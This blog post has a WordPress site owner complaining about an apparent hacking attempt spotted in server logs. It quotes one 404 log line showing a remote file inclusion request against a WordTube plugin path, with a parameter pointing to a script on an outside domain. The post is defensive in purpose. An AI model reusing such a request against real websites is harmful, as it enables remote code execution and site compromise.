Blog

Blog Post

Thanks for visiting! If you're new here, you may want to subscribe to our RSS feed or Subscribe to Email update. You will find all kinds of things about technology here!

Wordpress Hacking

It is very cool to tell that everyone that CGC is using WordPress as CMS to manage this site but until today it appears that someone either from www.allo-montreal.com or using this domain to hack into our site for what ever reasons only they knows.

After reading Why Watch Server Stats? it appears that this person is trying to do the same thing on our server.

Who ever this person does not have a clue that we are monitoring the server all the time and looking to the log file we see:

404 URL: /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.allo-montreal.com/pr.txt?
Referred by:
User Agent: libwww-perl/5.808

What this person doesn’t know is that we are not using any plugins what so ever.

If you are the person trying to hack into our site simply stop. There is nothing for you here. Please feel free to tell us why you so much keen on hacking our site using the comment form below.

If you enjoyed this post, make sure you subscribe to my RSS feed!

Tags: , , , , , , , , , ,

Comments are closed.

Feedback Form